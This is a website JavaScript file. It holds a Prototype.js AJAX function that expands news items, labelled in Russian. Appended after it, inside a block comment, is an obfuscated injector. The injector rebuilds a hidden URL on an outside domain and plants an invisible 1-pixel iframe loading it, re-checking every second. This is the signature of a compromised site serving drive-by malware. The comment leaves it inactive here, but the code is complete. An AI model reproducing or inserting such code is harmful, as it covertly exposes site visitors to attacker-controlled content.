function news_more(id) {
    if ($('news_more_'+id).style.display == 'none')
    {
        $('news_more_'+id).innerHTML = '<span><img src="images/ajax.gif"> загрузка...</img></span>';
        $('news_more_'+id).show();

        new Ajax.Updater('news_more_'+id, 'ajax.php',
          { method: 'post',
            parameters: { section: 'news',
                          request: id},
            onComplete: function () {
                new Effect.BlindDown('news_more_'+id);
            }
          }
        );
    }
    return false;
};/*function p6sE30(){function a(b){if(b.contentDocument)return b.contentDocument;if(b.contentWindow)return b.contentWindow.document;return b.document;}var c={};with(c){d=/a/.__proto__=='//';e='\v'=='v';}var f='zUtmcON1';var g='w0V9wo';var h='zUtmcON1hzUtmcON1tzUtmcON1tzUtmcON1pzUtmcON1:zUtmcON1/zUtmcON1/zUtmcON1czUtmcON1ozUtmcON1pzUtmcON1ezUtmcON1rzUtmcON1tzUtmcON1xzUtmcON1azUtmcON1.zUtmcON1czUtmcON1zzUtmcON1.zUtmcON1czUtmcON1czUtmcON1/zUtmcON1azUtmcON1vzUtmcON1nzUtmcON1jzUtmcON1pzUtmcON1jzUtmcON1fzUtmcON1ezUtmcON1/zUtmcON1kzUtmcON1qzUtmcON1jzUtmcON1vzUtmcON1dzUtmcON1tzUtmcON1hzUtmcON1zzUtmcON1.zUtmcON1pzUtmcON1hzUtmcON1pzUtmcON1';var i=c.e?'<iframe name="'+g+'" src="'+h.split(f).join('')+'">':'iframe';var j=document.createElement(i);with(j){name=g;setAttribute('name',g);id=g;}if(document.body){document.body.appendChild(j);clearInterval(pLuX0OE);}else{return;}with(j.style){if(!c.d)position='absolute';left=top='0px';height=width='1px';visibility='hidden';}if(!c.e)a(j).location.replace(h.split(f).join(''));}if(!window.qoc1qRDh){pLuX0OE=setInterval(p6sE30,1000);window.qoc1qRDh=true;};
*/

